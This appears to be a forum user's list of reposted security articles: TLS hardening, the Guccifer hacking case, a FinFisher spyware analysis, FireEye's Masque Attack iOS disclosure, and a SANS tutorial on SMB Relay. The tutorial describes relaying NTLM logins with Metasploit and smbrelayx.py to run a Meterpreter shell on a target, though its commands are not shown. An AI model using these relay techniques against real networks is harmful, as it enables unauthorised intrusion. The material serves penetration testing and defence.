certificate and request the CA to issue a new one. The old pin however would still be stored in browsers for six months which means they would not be able to connect to your site. By sending two pin-sha256 values the browser will later accept a TLS connection when any of the stored fingerprints match the given certificate. Known attacks In the past years (and especially the last year) a few attacks on SSL/TLS were published. Some of those attacks can be worked around on the protocol or crypto library level so that you basically do not have to worry as long as your web server is up to date and the visitor is using a modern browser. A few attacks however need to be thwarted by configuring your server properly. BEAST (Browser Exploit Against SSL/TLS) BEAST is an attack that only affects TLSv1.0. Exploiting this vulnerability is possible but rather difficult. You can either disable TLSv1.0 completely - which is certainly the preferred solution although you might neglect folks with old browsers on old operating systems - or you can just not worry. All major browsers have implemented workarounds so that it should not be an issue anymore in practice. BREACH (Browser Reconnaissance and Exfiltration via Adaptive Compression of Hypertext) BREACH is a security exploit against HTTPS when using HTTP compression. BREACH is based on CRIME but unlike CRIME - which can be successfully defended by turning off TLS compression (which is the default for Nginx and Apache nowadays) - BREACH can only be prevented by turning off HTTP compression. Another method to mitigate this would be to use cross-site request forgery (CSRF) protection or disable HTTP compression selectively based on headers sent by the application. POODLE (Padding Oracle On Downgraded Legacy Encryption) POODLE is yet another padding oracle attack on TLS. Luckily it only affects the predecessor of TLS which is SSLv3. The only solution when deploying a new server is to just disable SSLv3 completely. Fortunately, we already excluded SSLv3 in our list of preferred ciphers previously. Firefox 34 will ship with SSLv3 disabled by default, Chrome and others will hopefully follow soon. Further reading Thanks for reading and I am really glad you made it that far! I hope this post did not discourage you from deploying TLS - after all getting your setup right is the most important thing. And it certainly is better to to know what you are getting yourselves into than leaving your visitors unprotected. If you want to read even more about setting up TLS, the Mozilla Wiki page on Server-Side TLS has more information and proposed web server configurations. Thanks a lot to Frederik Braun for taking the time to proof-read this post and helping to clarify a few things! Sursa: https://timtaubert.de/blog/2014/10/deploying-tls-the-hard-way/
  17. [h=2]DuckDuckGo in Firefox[/h]9 hours and 6 minutes ago posted by yegg Staff We're excited to announce that DuckDuckGo is now included as a pre-installed search option in Firefox! Today is Firefox's 10th anniversary and with it comes a special release that includes DuckDuckGo. The DuckDuckGo and Firefox communities have always had a shared interest in privacy so we're very proud to be included and can't wait to see what we can accomplish! To use DuckDuckGo in Firefox, simply download the latest version and select us from the search dropdown: Sursa: https://duck.co/blog/firefox
  18. „Micul Fum“ ?i marele noroc. Cum a reu?it Guccifer s? sparg? contul Corinei Cre?u ?i s? bage spaima în familia Bush 11 noiembrie 2014, 16:12 de Octavian Palade Hackerul român Guccifer a devenit cunoscut dup? ce b?gat spaima în mai multe vedete ?i nume din politica româneasc? ?i interna?ional?. Acum, el se afl? în spatele gratiilor, unde a fost intervievat de reporterii „New York Times“. Într-un articol intitulat „Pentru Guccifer, s? fie hacker a fost u?or. S? fie pu?c?ria? este greu.”, Marcel-Lehel Laz?r, omul din spatele pseudonimului Guccifer, ?i-a spus povestea. Acesta a fost prins pe 22 ianuarie, anul acesta, dup? ce, timp de doi ani, a reu?it s? îi p?c?leasc? pe agen?ii FBI. „Îi a?teptam, dar ?ocul a fost foarte mare pentru mine. E greu s? fii hacker, dar e ?i mai greu s?-?i acoperi toate urmele“, a declarat Guccifer, pentru „New York Times“, din penintenciarul Arad. Acesta trebuie s? isp??easc? o sentin?? de ?apte ani. Înainte s? devin? Guccifer, nume care vine de la „stilul lui Gucci ?i lumina lui Lucifer“, Marcel a fost taximetrist. B?rbatul de 47 de ani era ?omer de câ?iva ani ?i nu avea cuno?tin?e tehnice ?i nici echipamente sofisticate. Din spatele unui computer obosit, Marcel a înv??at rapid o îndeletnicire nou?. În multe feluri, acesta a ar?tat tuturor cât de u?or po?i fi infractor pe Internet ?i cum po?i sta cu un pas în fa?a oamenilor legii dac? ai ni?te cuno?tin?e rudimentare. „Nu era cu adev?rat un hacker, ci doar un tip foarte de?tept, foarte r?bd?tor ?i foarte persistent“, a declarat Viorel Badea, procurorul care s-a ocupat de caz. Guccifer este cunoscut pentru faptul c? a f?cut publice o serie de auto-portrete realizate de fostul pre?edinte american George W. Bush, c? a ar?tat tuturor „flirturile“ dintre Corina Cre?u, membr? a Parlamentului European, ?i Colin Powel, dar ?i c? a ob?inut numeroase fotografii ?i mesaje private ale unor vedete na?ionale ?i interna?ionale. „Este vorba doar despre un român s?rac care voia s? fie faimos“, a mai declarat Badea. Laz?r a reu?it s? sparg? toate conturile ghicind parolele fiec?rei persoane vizate. În loc s? foloseasc? viru?i sofistica?i sau alte unelte specifice infractorilor cibernetici, el c?uta pe Internet cât mai multe informa?ii despre ?intele lui, informa?ii pe care le folosea pentru a r?spunde întreb?rilor de securitate necesare ob?inerii unei parole. Pentru a sparge parola Corinei Cre?u, el s-a chinuit ?ase luni de zile. „Trucul“ nu era unul nou pentru ar?dean. Laz?r a mai f?cut pu?c?rie în 2011, dup? ce, sub pseudonimul „Micul Fum“, a accesat, în acela?i fel, conturile personale ale unor vedete autohtone precum Bianca Dr?gu?anu, Laura Cosoi, Corina Caragea sau Drago? Mo?tenescu. În ciuda condamn?rii din 2011, Guccifer a dat dovad? de arogan?? ?i credea c? nu va fi niciodat? prins. Pe 6 iunie 2013, el a început s? se laude pe site-ul publica?iei americane „The Smoking Gun“, l?sând un comentariu stâlcit în limba englez?. „Nu sunt îngrijorat. Cred c? voi schimba proxiurile, voi juca table pe Yahoo, m? voi uita la televizor ?i m? voi juca cu fiica ?i cu restul familiei mele“, scria acesta. O zi mai târziu, totu?i, un anun? al ?efului SRI George Maior l-a pus pe jar. Acesta a declarat c? în curând îl va captura pe „Micul Guccifer“. Laz?r a crezut c? autorit??ile române f?cuser? leg?tura dintre „Micul Fum“ ?i „Guccifer“, a?a c? a început s?-?i fac? buc??i componentele de computer, într-o încercare disperat? de a-?i acoperi urmele. Maior a spus, mai târziu, c? în momentul în care a f?cut anun?ul, nu ?tia c? hackerul mai fusese prins în trecut ?i a recunoscut c? doar încerca s? îi minimizeze importan?a. Care a fost, totu?i, motivul pentru care Guccifer a ac?ionat cum a ac?ionat? El nu a furat niciun ban ?i nici nu a încercat s? ?antajeze pe nimeni. Se pare c? este vorba de o doz? mare de paranoia. „Lumea este condus? de un grup de conspiratori, numit Consiliul Illuminati, format din oameni foarte boga?i, familii nobile, bancheri”, s-a ap?rat acesta, într-un manifest scris de mân? pe care l-a citit reporterilor. El a spus c? nu avea niciun interes s? sparg? conturile vedetelor, ci doar s-a întâmplat s? dea peste ele încercând s? p?trund? în vie?ile private ale altor persoane. Acum, Guccifer împarte celula cu înc? patru persoane ?i nu are acces la un computer. Toate gândurile ?i teoriile conspira?ioniste le scrie de mân? într-un carne?el. „Am înc?lcat legea, dar s? execut ?apte ani într-o închisoare de maxim? securitate? Nu sunt un criminal sau un ho?. Ce am f?cut a fost drept“, a mai declarat el. Sursa: „Micul Fum“ ?i marele noroc. Cum a reu?it Guccifer s? sparg? contul Corinei Cre?u ?i s? bage spaima în familia Bush | adevarul.ro
  19. Inside FinFisher: examining the intrusive toolset On November 10, 2014 | Posted by Sohail Abid In Blog With tags Finfisher FinFisher, a company known for making and selling a wide range of spy software to world governments for large sums of money, was hacked in the first week of August this year. The anonymous hackers leaked a 40GB torrent including the entire FinFisher support portal with obfuscated information about the buyers, list of software they had purchased, duration of each license, and their communication with the support staff. The leak helped human rights activists around the world identify the buyers, hold their governments to account for the purchases, and question the necessity of such a measure. Digital Rights Foundation also released a report detailing the evidence of Pakistan’s purchase of three software from FinFisher. The leak generated a lot of buzz and rightly so. But the coverage from mainstream media and human rights organizations was primarily limited to reporting the leak, identifying the buyers, and potential human rights implications. There hasn’t been an in-depth coverage of the scope and capabilities of the whole set of software FinFisher sells. This is what we intend to do in the current article. Understanding FinFisher FinFisher is not just a software. It’s a well-thought-out and sophisticated toolset, comprising of both software and hardware, built from the ground up to gain access to people’s private data and communications. Well thought out in the sense that each tool compliments the others in breaking into someone’s communication and sophisticated in the way the tools are generally invisible to the person. An overview of the FinFisher toolset; please click on the image to enlarge. At the time of the leak, FinFisher had 12 products available on its website: ten hardware+software solutions to break into computers and mobiles, a repository of 0-day and 1-day exploits that can be used to infect the target systems, and a training program. Among these solutions, FinSpy is the jewel of the crown. It is a remote monitoring solution that is capable to basically let the buyer see everything someone does on their computer. How Do They Break In It is easier if they, or anyone they know, have access to the computer. FinFisher offers three solutions for this situation. Two of them (FinUSB Suite and FinFly USB) involve attaching a USB drive to the computer, it does not matter if the computer is shut down or logged in, password protected or not. Once the USB is attached, the system becomes compromised. Third one (FinFireWire) is a set of adapter cards (FireWire/1394, PCMCIA and Express Card) and associated cables that, when attached, give access to a running but password protected Mac, Windows, or Linux computer. Four FinFisher solutions are designed for the situations when they don’t have physical access to someone’s computer. FinFly Net consists of a small portable computer that is attached to the router of a hotel or airport or any other “friendly” place and a laptop. Once the FinFly Net computer is The management laptop can then see internet traffic being sent and received by the people attached to the network. It can also display a fake software upgrade notification to the target, which when installed, gives complete access to that computer. Since this solution sits between all internet traffic going to and from the people connected to the network, this solution is also capable to insert a software update (Adobe Flash, for example) notification on a legitimate website. FinFly LAN can also attach spying software with legitimate files on-the-fly, while being in the same wired or wireless network. FinFly Web creates fake websites which make use of the loopholes in web browsers to instantly install FinSpy, the crown jewel in the FinFisher toolset. FinFly ISP is a hardware solution deployed at an ISP to covertly install spy software to any computer in a city or country. This solution is able to “patch” any legitimate files being downloaded by people with a spying software. Like FinFlyNet, it can also issue fake upgrade notifications for popular software like iTunes. The computer becomes compromised as soon as the downloaded files are run or software upgrade is applied. FinIntrusion Kit is an advanced toolkit that includes a customized Linux laptop with a host of adapters and antennas and can break WEP and WPA/WPA2 passphrases. What Can They See A lot. But let’s go through it step by step. IN CASE OF PHYSICAL ACCESS FinUSB toolkit can extracts login credentials from common programs like email clients, chat messengers, and remote desktop tools. It can also silently copy recently opened, created, or edited files from the computer as well as browsing history, chat logs, and wifi passwords. FinFireWire, after bypassing the login or lock screen, can recover passwords from RAM and copy all files onto an external drive. IN CASE OF CLOSE PROXIMITY LIKE AIRPORTS HOTELS FinIntrusionKit, which only requires the target to be on the same network like airport or hotel, can capture usernames and passwords being entered on websites, in addition to any other internet traffic, even if it’s on HTTPS. Your browser does not support the video tag. FinFly Net and FinFly LAN lead to the installation of FinSpy which then gives full access to all data and communications for a system. IN CASE OF NO PHYSICAL ACCESS OR PROXIMITY FinFisher provides FinFly ISP and FinFly Web to infect people who are not in close proximity. Once infected, full access to these computers will be granted. Your browser does not support the video tag. A video detailing how FinFly ISP works FinSpy: Jewel of the Crown Marketed as a ‘remote monitoring solution,’ FinSpy is the multi-purpose spying software around which the whole company revolves. It gives opens a backdoor to the infected computer allowing for live access to all files and data. It also enables access to the mic and webcam installed on the computer for “live surveillance.” It can also save an audio or video recording of each Skype call and send it to the buyer. And it can, FinFisher flaunts, “bypass almost 40 regularly tested antivirus systems.” FinSpy Control Center. Click on the image to enlarge. Note the area in red: Those are the actions that can be taken on an infected computer. Your browser does not support the video tag. We have a saying in Punjabi to seek refuge from something terrible: May this not happen even to my enemy. I’ll end this post at that. About the author: Sohail Abid researches surveillance and censorship issues at Digital Rights Foundation. Before joining DRF, he was CTO at Jumpshare, a file sharing startup from Pakistan. Sursa: Inside FinFisher: examining the intrusive toolset | Digital Rights Foundation
  20. [h=2]Masque Attack: All Your iOS Apps Belong to Us[/h] November 10, 2014 | By Hui Xue, Tao Wei and Yulong Zhang | Exploits, Mobile Threats, Targeted Attack, Threat Intelligence, Threat Research, Vulnerabilities In July 2014, FireEye mobile security researchers have discovered that an iOS app installed using enterprise/ad-hoc provisioning could replace another genuine app installed through the App Store, as long as both apps used the same bundle identifier. This in-house app may display an arbitrary title (like “New Flappy Bird”) that lures the user to install it, but the app can replace another genuine app after installation. All apps can be replaced except iOS preinstalled apps, such as Mobile Safari. This vulnerability exists because iOS doesn't enforce matching certificates for apps with the same bundle identifier. We verified this vulnerability on iOS 7.1.1, 7.1.2, 8.0, 8.1 and 8.1.1 beta, for both jailbroken and non-jailbroken devices. An attacker can leverage this vulnerability both through wireless networks and USB. We named this attack “Masque Attack," and have created a demo video here: We have notified Apple about this vulnerability on July 26. Recently Claud Xiao discovered the “WireLurker” malware. After looking into WireLurker, we found that it started to utilize a limited form of Masque Attacks to attack iOS devices through USB. Masque Attacks can pose much bigger threats than WireLurker. Masque Attacks can replace authentic apps,such as banking and email apps, using attacker's malware through the Internet. That means the attacker can steal user's banking credentials by replacing an authentic banking app with an malware that has identical UI. Surprisingly, the malware can even access the original app's local data, which wasn't removed when the original app was replaced. These data may contain cached emails, or even login-tokens which the malware can use to log into the user's account directly. We have seen proofs that this issue started to circulate. In this situation, we consider it urgent to let the public know, since there could be existing attacks that haven’t been found by security vendors. We are also sharing mitigation measures to help iOS users better protect themselves. [h=2]Security Impacts[/h] By leveraging Masque Attack, an attacker can lure a victim to install an app with a deceiving name crafted by the attacker (like “New Angry Bird”), and the iOS system will use it to replace a legitimate app with the same bundle identifier. Masque Attack couldn't replace Apple's own platform apps such as Mobile Safari, but it can replace apps installed from app store. Masque Attack has severe security consequences: Attackers could mimic the original app’s login interface to steal the victim’s login credentials. We have confirmed this through multiple email and banking apps, where the malware uses a UI identical to the original app to trick the user into entering real login credentials and upload them to a remote server. We also found that data under the original app’s directory, such as local data caches, remained in the malware local directory after the original app was replaced. The malware can steal these sensitive data. We have confirmed this attack with email apps where the malware can steal local caches of important emails and upload them to remote server. The MDM interface couldn’t distinguish the malware from the original app, because they used the same bundle identifier. Currently there is no MDM API to get the certificate information for each app. Thus, it is difficult for MDM to detect such attacks. As mentioned in our Virus Bulletin 2014 paper “Apple without a shell - iOS under targeted attack”, apps distributed using enterprise provisioning profiles (which we call “EnPublic apps”) aren’t subjected to Apple’s review process. Therefore, the attacker can leverage iOS private APIs for powerful attacks such as background monitoring (CVE-2014-1276) and mimic iCloud’s UI to steal the user’s Apple ID and password. The attacker can also use Masque Attacks to bypass the normal app sandbox and then get root privileges by attacking known iOS vulnerabilities, such as the ones used by the Pangu team. [h=2]An Example[/h] In one of our experiments, we used an in-house app with a bundle identifier “com.google.Gmail” with a title “New Flappy Bird”. We signed this app using an enterprise certificate. When we installed this app from a website, it replaced the original Gmail app on the phone. Figure 1 Figure 1 illustrates this process. Figure 1(a) ( show the genuine Gmail app installed on the device with 22 unread emails. Figure 1© shows that the victim was lured to install an in-house app called “New Flappy Bird” from a website. Note that “New Flappy Bird” is the title for this app and the attacker can set it to an arbitrary value when preparing this app. However, this app has a bundle identifier “com.google.Gmail”. After the victim clicks “Install”, Figure 1(d) shows the in-house app was replacing the original Gmail app during the installation. Figure 1(e) shows that the original Gmail app was replaced by the in-house app. After installation, when opening the new “Gmail” app, the user will be automatically logged in with almost the same UI except for a small text box at the top saying “yes, you are pwned” which we designed to easily illustrate the attack. Attackers won’t show such courtesy in real world attacks. Meanwhile, the original authentic Gmail app’s local cached emails, which were stored as clear-text in a sqlite3 database as shown in Figure 2, are uploaded to a remote server. Note that Masque Attack happens completely over the wireless network, without relying on connecting the device to a computer. Figure 2 [h=2]Mitigations[/h] iOS users can protect themselves from Masque Attacks by following three steps: Don’t install apps from third-party sources other than Apple’s official App Store or the user’s own organization Don’t click “Install” on a pop-up from a third-party web page, as shown in Figure 1©, no matter what the pop-up says about the app. The pop-up can show attractive app titles crafted by the attacker When opening an app, if iOS shows an alert with “Untrusted App Developer”, as shown in Figure 3, click on “Don’t Trust” and uninstall the app immediately Figure 3 To check whether there are apps already installed through Masque Attacks, iOS 7 users can check the enterprise provisioning profiles installed on their iOS devices, which indicate the signing identities of possible malware delivered by Masque Attacks, by checking “Settings - > General -> Profiles” for “PROVISIONING PROFILES”. iOS 7 users can report suspicious provisioning profiles to their security department. Deleting a provisioning profile will prevent enterprise signed apps which rely on that specific profile from running. However, iOS 8 devices don’t show provisioning profiles already installed on the devices and we suggest taking extra caution when installing apps. We disclosed this vulnerability to Apple in July. Because all the existing standard protections or interfaces by Apple cannot prevent such an attack, we are asking Apple to provide more powerful interfaces to professional security vendors to protect enterprise users from these and other advanced attacks. We thank FireEye team members Noah Johnson and Andrew Osheroff for their help in producing the demo video. We also want to thank Kyrksen Storer and Lynn Thorne for their help improving this blog. Special thanks to Zheng Bu for his valuable comments and feedback. This entry was posted in Exploits, Mobile Threats, Targeted Attack, Threat Intelligence, Threat Research, Vulnerabilities and tagged iOS Vulnerability, Masque Attack, WireLurker by Hui Xue, Tao Wei and Yulong Zhang. Bookmark the permalink. Sursa: Masque Attack: All Your iOS Apps Belong to Us | FireEye Blog
  21. German spies want millions of Euros to buy zero-day code holes Because once we own them, nobody else can ... oh, wait By Richard Chirgwin, 11 Nov 2014 Germany's spooks have come under fire for reportedly seeking funds to find bugs – not to fix them, but to hoard them. According to The Süddeutsche Zeitung, the country's BND – its federal intelligence service – wants €300 million in funding for what it calls the Strategic Technical Initiative. The Local says €4.5 million of that will be spent seeking bugs in SSL and HTTPS. The BND is shopping for zero-day bugs not to fix them, but to exploit them, the report claims, and that's drawn criticism from NGOs, the Pirate Party, and the Chaos Computer Club (CCC). German Pirate Party president Stefan Körner told The Local people should fear governments more than cyber-terror. Körner is also critical of the strategy on the basis that governments shouldn't be helping fund the grey market for security vulnerabilities, a sentiment echoed by the CCC. The CCC's Dirk Engling called the proposal legally questionable and damaging to the German economy. The SZ report also points out the serious risk that a zero-day bought on the black market will also be available for purchase by criminals for exploitation. The BND proposal would seem to put it at odds with America's NSA, which put its hand on its heart last week and promised that it shares “most” of the bugs it finds so they can be fixed. (The Register can't help but wonder if a parter agency hoarding bugs would be resisted by the NSA, or if it provides an escape clause to the promise to share bugs). The BND also wants to spend €1.1 million to set up a honey-pot, and is in the early stages of conducting social network analysis, with a prototype program slated for completion by June 2015. ® Sursa: German spies want millions of Euros to buy zero-day code holes • The Register
  22. Ar mai fi si XenForo, dar nu stiu foarte multe despre el.
  23. SMB Relay Demystified and NTLMv2 Pwnage with Python Posted by eskoudis Filed under Metasploit, Methodology, Passwords, Python By Mark Baggett [Editor's Note: In this _excellent_ article, Mark Baggett explains in detail how the very powerful SMBRelay attack works and offers tips for how penetration testers can operationalize around it. And, bet yet, about 2/3rds of the way in, Mark shows how you can use a Python module to perform these attacks in an environment that uses only NTLMv2, a more secure Windows authentication mechanism. Really good stuff! --Ed.] The SMB Relay attack is one of those awesome tactics that really helps penetration testers demonstrate significant risk in a target organization; it is reliable, effective, and almost always works. Even when the organization has good patch management practices, the SMB Relay attack can still get you access to critical assets. Most networks have several automated systems that connect to all the hosts on the network to perform various management tasks. For example, software inventory systems, antivirus updates, nightly backups, software updates and patch management, desktop backups, event log collectors, and other processes will routinely connect to every host on the network, login with administrative credentials and perform some management function. In some organizations, active defense systems such as Antivirus Rogue host detection will immediately attempt to login to any host that shows up on the network. These systems will typically try long lists of administrative usernames and passwords as they try to gain access to the unknown host that has mysteriously appeared on the network. SMB Relay attacks allow us to grab these authentication attempts and use them to access systems on the network. In a way, SMB Relays are the network version of Pass the Hash attacks (which Ed Skoudis described briefly in the context of psexec in his Pen Tester's Pledge article). Let's look at how these attacks work. NTLM is a challenge/response protocol. The authentication happens something like this: First, the client attempts to login and the server responds with a challenge. In effect the server says, "If you are who you say you are, then encrypt this thing (Challenge X) with your hash." Next, the client encrypts the challenge and sends back the encrypted challenge response. The server then attempts to decrypt that encrypted challenge response with the user's password hash. If it decrypts to reveal the challenge that it sent, then the user is authenticated. Here is an illustration of a challenge/response authentication. With SMB Relay attacks, the attacker inserts himself into the middle of that exchange. The attacker selects the target server he wants to authenticate to and then the attacker waits for someone on the network to authenticate to his machine. This is where rogue host detection, vulnerability scanners, and administrator scripts that automatically authenticate to hosts become a penetration tester's best friends. When the automated process connects to the attacker, he passes the authentication attempt off to his target (another system on the network, perhaps a server). The target generates a challenge and sends it back to the attacker. The attacker sends the challenge back to the originating scanning system. The scanning system encrypts the hash with the correct password hash and sends it to the attacker. The attacker passes the correctly encrypted response back to his target and successfully authenticates. This process is shown in the next illustration. The BLUE arrows are the original communications and the RED arrows are slightly modified versions of those communications that the attacker is relaying to his target, so that he can gain access to it. Although this may seem complicated, it is actually very easy to exploit.In this example, the attacker (let's say he's at IP address 10.10.12.10) wants to gain access to the server at the IP address 10.10.12.20 (perhaps a juicy file server).There is a nightly software inventory process on the server at 10.10.12.19 that inventories all the hosts on the network. Scenario Attacker IP - 10.10.12.10 Target IP - 10.10.12.20 Nightly Inventory Scanner IP - 10.10.12.19 Metasploit has an SMB Relay Module and it works wonderfully. The attacker at 10.10.12.10 sets up Metasploit as follows: I'll use a simple Windows FOR loop to simulate an administrative server scanning the network and doing inventory. On host 10.10.12.19 I run the following command. When the scanner (10.10.12.19) connects to 10.10.12.10 (our Metasploit listener) the authentication attempt is relayed to the target server (10.10.12.20). The relayed authentication happens like magic and Metasploit automatically uses the authenticated SMB session to launch the meterpreter payload on the target. Notice in the figure below that Metasploit sends an "Access Denied" back to the inventory scanner when it attempted to connect to 10.10.12.10. However, the damage is done and we get a Meterpreter shell on the attacker's machine running on the target (10.10.12.20). Today, Metasploit's SMB Relay only supports NTLMv1, so organizations can protect themselves from this attack by changing the AD policy from this setting (available in secpol.msc) ... To this... After we make the change to NTLMv2, we try Metasploit again. Now when we run the exploit, Metasploit gets a "Failed to authenticate" error message. DRAT, our dastardly plan has been foiled by modern security protocols. Metasploit has support for NTLMv2 in other exploits such as http_ntlmrelay, so I imagine this exploit will eventually support NTLMv2. But, don't worry. We've got you covered. Until then, it is PYTHON TO THE RESCUE! Two weeks ago, I showed you psexec.py in my blog post about using a Python version of psexec atSANS Penetration Testing | Psexec Python Rocks! | SANS Institute) It is a Python implementation of psexec that is distributed with the IMPACKET modules. The team writing the IMPACKET module for Python is doing some really awesome work. First of all, the modules they have written are awesome. Beyond that, they have created several example programs that demonstrate the power of their Python modules. Best of all, the SMBRELAYX.PY script that comes with IMPACKET supports NTLMv2! Sweetness, thy name is IMPACKET! Getting the script running will take a little bit of work. You'll need to download the latest version of IMPACKET and fix the module paths to get it up and running. To fix this, I put all of the examples in the same directory as the other modules and then change the import statements to reflect the correct directories. SMBRELAYX needs an executable to run on the remote host after it authenticates. What could be better than the meterpreter? Let's use msfpayload to create a Meterpreter EXE and then setup SMBRELAYX. Smbrelayx.py requires two parameters: —h is the host you are going to attack and —e is the process to launch on the remote host. You just provide those options and sit back and wait for that inventory scanner to connect to your system. Below, I show msfpayload creating the Meterpreter executable, and the invocation of smbrelayx.py: Because we are using a meterpreter reverse shell, we also have to setup Metasploit so that it is ready to receive the payload connection after it executes on the target. That is what the multi/handler exploit is for, as shown below: Now, I'll simulate the scanner by attempting to connect to the C$ of our attacker's Linux box (10.10.12.10) from the scanner server (10.10.12.19). Instead of getting back an "Access Denied" like we did from Metasploit, we get back a "System cannot find the path specified" error. I like this error message. I think a system admin might question why his username and password didn't work on a target before he would question why the path doesn't exist. The smbrelayx.py script's message back to the admin seems therefore more subtle than the Metasploit message and less likely to get noticed. Immediately we see the relay occur in the Python script. It authenticates to 10.10.12.20 and launches the meterpreter process as a service using the username and password provided by 10.10.12.19. The payload is delivered to the target after authenticating over NTLMv2 and meterpreter is launched on the target. To keep our shell, we need to quickly migrate to another more stable process (to help automate that migration, we could use one of the migration scripts available for the meterpreter). Ah, the delicious smell of a brand new meterpreter shell. And of course, because it is a Python module, you can incorporate this script into your own automated attack tools. Would you like more information about how you can create your own Python-powered attack tools? I'm sure you do! Join me for my brand-new SANS course, SEC573 Python for Penetration tester. Python for Penetration Testers | Course | Python Penetration Testing Thank you! --Mark Baggett Sursa: SANS Penetration Testing | SMB Relay Demystified and NTLMv2 Pwnage with Python | SANS Institute
  24. Host a tor server entirely in RAM with Tor-ramdisk Hacker10 | 7 May, 2012 | Anonymity | No Comments Tor-ramdisk is a tiny Linux distribution (5MB) developed by the IT department at D’Youville College (USA) to securely host a tor proxy server in RAM memory, it can run in old diskless hardware and it will stop a forensic analysis from people stealing or seizing a tor server. In the event that a tor server is seized due to ignorance or calculated harassment, and it would not be the first time, the end user would still safe because the chained nature of the tor proxy network makes it impossible to find out someone’s computer IP by seizing a single server but other data, even if meaningless, can still be recovered, running tor in RAM is an extra security step that can help convince people that the machine is merely acting as a relay as it contains no hard drive. When a Tor-ramdisk server is powered down all the information is erased with no possibility of recovery, the tor configuration file and private encryption (torrc& secret_id_key) in between reboots can be preserved exporting and importing them using FTP or SSH making the life of a tor node operator easy. One disadvantage of running a tor node entirely in RAM memory is that it can not host hidden services as that requires hard drive space, other than it is a fully functional entry,middle or exit tor node. I would advise you to block all ports (USB,Firewire) in the server with epoxy, there are computer forensic tools that can be plugged into the USB port and make a copy of the RAM memory on the fly. You might have heard about the cold boot attack where someone with physical access to a recently switched off server or computer can still retrieve data remanence from RAM memory, this is not easy to achieve and the recovery timespan is comprised of a few seconds. Visit Tor-ramdisk homepage: Tor-ramdisk | opensource.dyc.edu Sursa: Host a tor server entirely in RAM with Tor-ramdisk | Hacker 10 - Security Hacker
  25. ScyllaHide is an advanced open-source x64/x86 usermode Anti-Anti-Debug library. It hooks various functions in usermode to hide debugging. This tool is intended to stay in usermode (ring3). If you need kernelmode (ring0) Anti-Anti-Debug please see TitanHide https://bitbucket.org/mrexodia/titanhide. ScyllaHide supports various debuggers with plugins: OllyDbg v1 and v2 OllyDbg v1.10 x64_dbg x64_dbg or https://bitbucket.org/mrexodia/x64_dbg Hex-Rays IDA v6+ https://www.hex-rays.com/products/ida/ TitanEngine v2 https://bitbucket.org/mrexodia/titanengine-update and TitanEngine | Open Source | ReversingLabs PE x64 debugging is fully supported with plugins for x64_dbg and IDA. Please note: ScyllaHide is not limited to these debuggers. You can use the standalone commandline version of ScyllaHide. You can inject ScyllaHide in any process debugged by any debugger. More information is available in the documentation: https://bitbucket.org/NtQuery/scyllahide/downloads/ScyllaHide.pdf Source code license: GNU General Public License v3 https://www.gnu.org/licenses/gpl-3.0.en.html Special thanks to: What for his POISON Assembler source code https://tuts4you.com/download.php?view.2281 waliedassar for his blog posts waliedassar Peter Ferrie for his PDFs Homepage of Peter Ferrie MaRKuS-DJM for OllyAdvanced assembler source code MS Spy++ style Window Finder MS Spy++ style Window Finder - CodeProject Sursa: https://bitbucket.org/NtQuery/scyllahide
×
×
  • Create New...